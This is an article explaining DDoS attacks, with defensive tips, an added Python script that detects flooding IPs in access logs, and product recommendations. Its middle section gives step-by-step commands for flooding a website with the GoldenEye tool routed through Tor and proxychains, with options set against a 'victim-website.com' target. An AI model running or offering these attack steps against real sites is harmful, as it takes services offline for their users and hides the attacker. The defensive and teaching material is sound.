DDoS attack tools can direct heavy loads at HTTP servers and knock them out of service. Today we will tell you about DDoS attacks and how they are conducted.
DDoS – a hacker attack on a computer system intended to bring it down, that is, to create conditions in which legitimate users of the system cannot access the resources (servers) it provides, or can access them only with difficulty.
How does this attack work and who uses it?
Each web server has a limit on the number of requests it can serve at a time. If the number of requests exceeds that limit, the following is quite possible:
- Server slowdown (requests are processed more slowly)
- Complete denial of service (requests are no longer served at all)
Most often, the attackers aim for the second – complete denial of service. Motives vary: from "protecting" users from fraudulent sites to plain boredom.
It should be said, though, that not only attackers but also "white hat hackers", i.e. pentesters, use these attacks. With them, ethical hackers test web servers for capacity and for their ability to handle a large number of simultaneous requests.
DDoS works like this: the attacker builds a network of "zombie computers" (they are not necessarily computers: any device capable of sending requests will do for this attack) and then uses this network to carry out the attack.
Let's imagine the situation: the maximum volume of traffic the server can receive is 1 GB. The attacker tries to reach or exceed this barrier. If that succeeds, the server first slows down and then may go down entirely.
Now the interesting part: how is an attack like this conducted? Let us warn you right away – everything described below is for information purposes only. You can't break other people's servers; that can be a legal problem. You have been warned.
- EtherApe – a graphical network monitor that displays network activity visually. Hosts and links change size with the amount of traffic, and protocols are shown in different colours.
- Tor service – Tor allows clients and relays to offer hidden services. That is, you can offer a web server, SSH server, etc. without disclosing your IP address to your users.
- Proxychains – the latest version of Proxychains supports SOCKS5, SOCKS4 and HTTP CONNECT. Proxy chains can mix different types of proxy.
- GoldenEye – a Python application designed for security testing purposes only.
How to perform a DDoS attack on a website?
1. Run EtherApe with the command etherape; a window will appear that graphically displays the network activity.
2. Start the Tor service:
service tor start
3. Download GoldenEye.
4. After downloading, unpack it into a folder.
5. Start the attack:
/GoldenEye-master# proxychains ./goldeneye.py http://testdomain.com
Add values for workers (-w), sockets (-s) and method (-m):
./goldeneye.py victim-website.com -w 100 -s 70 -m post
If you do not stop the attack, in some cases it will "blow up" on its own. To stop the attack, just press CTRL+C.
Done. After a while the server will slow down and then possibly go down.
General protection against DDoS attacks
- Limit the connection rate per source IP.
- Use an IDS and a web application firewall.
- Tune per-IP connection limits.
- Secure your DNS servers.
- Deploy protective tooling. Make sure you have the appropriate security features installed for both your network and your applications. This includes key tools such as firewalls, network monitoring software and antivirus software, as well as threat monitoring systems. With them, you can monitor baseline network traffic and configure alerts for unusual behaviour.
- Keep everything up to date. All these systems must be updated so that any bugs or problems are corrected. Detecting threats as early as possible is the best way to prevent DDoS attacks on critical network infrastructure from impacting end users.
- Detect threats as early as possible.
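The "alert on unusual behaviour" and "limit the connection rate per source IP" points above can be tried out on ordinary access logs. The following is an added example written for this page, not code from the original article or from any of the tools it names. It parses Common Log Format lines (as nginx and Apache write them), keeps a sliding window of request timestamps per source IP, flags any IP that exceeds a request threshold inside the window, and renders the flagged IPs as nginx deny directives. The log lines, IP addresses (from the documentation ranges) and thresholds are all constructed sample data.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Common Log Format fields as nginx/Apache write them; only the needed groups are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample log: one normal client (198.51.100.4), one client hammering
# /login (203.0.113.7), and one unparsable line that a robust parser must skip.
SAMPLE_LOG = """\
198.51.100.4 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 612
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "POST /login HTTP/1.1" 200 812
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "POST /login HTTP/1.1" 200 812
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "POST /login HTTP/1.1" 200 812
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "POST /login HTTP/1.1" 200 812
203.0.113.7 - - [10/Oct/2023:13:55:42 +0000] "POST /login HTTP/1.1" 200 812
this line is garbage and must be skipped
203.0.113.7 - - [10/Oct/2023:13:55:42 +0000] "POST /login HTTP/1.1" 200 812
203.0.113.7 - - [10/Oct/2023:13:55:43 +0000] "POST /login HTTP/1.1" 503 0
198.51.100.4 - - [10/Oct/2023:13:56:05 +0000] "GET /about HTTP/1.1" 200 1024
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it is not CLF."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    when = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),            # original timestamp text, kept for the alert
        "time": when.timestamp(),       # seconds since epoch, used for the window
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def flag_flooders(lines, max_requests=5, window_seconds=10):
    """Sliding-window per-IP rate check.

    Returns {ip: {"first_exceeded": <log timestamp>, "requests_in_window": n}}
    for every IP that sent more than max_requests requests inside any
    window_seconds interval. Lines must be in chronological order, which is
    how a tailed log arrives. Thresholds here are illustrative, not a recommendation.
    """
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        q = recent[rec["ip"]]
        q.append(rec["time"])
        # Drop timestamps that have fallen out of the window.
        while q and rec["time"] - q[0] > window_seconds:
            q.popleft()
        if len(q) > max_requests and rec["ip"] not in flagged:
            flagged[rec["ip"]] = {"first_exceeded": rec["ts"], "requests_in_window": len(q)}
    return flagged


def error_ratio(lines):
    """Share of 5xx responses among parsable lines: a server-side symptom of saturation."""
    records = [r for r in map(parse_line, lines) if r is not None]
    if not records:
        return 0.0
    return sum(1 for r in records if 500 <= r["status"] < 600) / len(records)


def deny_directives(flagged):
    """Render flagged IPs as nginx 'deny' directives, sorted for stable output."""
    return [f"deny {ip};" for ip in sorted(flagged)]


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for ip, info in flag_flooders(lines).items():
        print(f"ALERT {ip}: {info['requests_in_window']} requests in window, first at {info['first_exceeded']}")
    print(f"5xx ratio: {error_ratio(lines):.2f}")
    print("\n".join(deny_directives(flag_flooders(lines))))
```

In practice the deny list would be written to a file that nginx includes and reloads, and the thresholds tuned against a baseline of normal traffic; a threshold set too low blocks legitimate clients behind a shared NAT address, which is the main false-positive risk of per-IP limiting.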
DDoS Prevention Tools
There are several tools that I recommend for preventing and stopping DDoS attacks.
1. Security Event Manager
To monitor network behaviour and flag threats before they get out of hand, I like SolarWinds Security Event Manager (SEM).
The ability to respond quickly to a threat is vital, as security measures can quickly become useless if they take too long to deploy. SEM includes automatic responses that can block suspicious IPs or USB devices, disable malicious devices or their privileges, and kill applications that behave unexpectedly. This means that delays when dealing with something like a DDoS attack are kept to a minimum.
SEM also monitors the integrity of files and USB devices, so if something looks wrong it can be stopped.
SolarWinds SEM is available free for a thirty-day trial. After that, pricing is per node.
2. Cloudflare
Cloudflare offers a flexible and scalable tool that integrates several DDoS prevention methods into one solution. It keeps malicious traffic out of your network while the rest of the network remains functional and performant. Cloudflare uses a reputation database to track potential threats from attackers.
Cloudflare costs $200 per month for businesses, but at the enterprise level you need to contact Cloudflare for a quote.
3. Imperva DDoS Protection
Imperva DDoS Protection covers the entire network and defends against attacks by absorbing high-volume packet floods. It provides always-on as well as on-demand protection against DDoS attacks, depending on what suits your business best. It also includes automatically updated monitoring dashboards displaying information about attack traffic. The main disadvantage of the Imperva tool is that it is limited in its protection against DDoS attacks.